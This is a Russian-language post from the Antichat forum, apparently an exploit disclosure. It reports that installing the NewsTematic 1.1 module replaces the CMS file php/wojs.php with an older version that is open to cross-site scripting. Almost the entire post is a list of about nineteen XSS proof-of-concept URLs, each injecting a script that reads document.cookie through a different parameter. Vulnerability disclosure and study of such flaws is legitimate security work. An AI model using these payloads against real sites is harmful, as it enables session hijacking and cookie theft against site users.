Форум АНТИЧАТ - Показать сообщение отдельно

Множественные XSS в модуле NewsTematic 1.1

Тут следует обратить внимание на файл php/wojs.php поставляемый вместе с модулем. Как можно заметить данный файл присутствует и в самой cms и в последних версиях этой cms этот файл не уязвим, но в модуле данный файл взят из более ранних версий, и при установке данного модуля неуязвимый файл меняется на другой-уязвимый, что приводит к большому количеству XSS. На всякий случай я повторю сплоенты:

Код:

http://test2.ru/php/wojs.php?tit=</title><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?name_titl=</title><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?inflang='></script><script>alert(document.cookie)</script><d d='
http://test2.ru/php/wojs.php?type='></script><script>alert(document.cookie)</script><d d='
http://test2.ru/php/wojs.php?inflang=alert(document.cookie)</script>
http://test2.ru/php/wojs.php?type=alert(document.cookie)</script>
http://test2.ru/php/wojs.php?bord=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?bg=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?bgz=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?zag=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?txt=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?fs=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?cnt=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?tit=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?simage=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?hover=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?vdata=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?wd=</script><script>alert(document.cookie)</script>
http://test2.ru/php/wojs.php?wd=</script><script>alert(document.cookie)</script>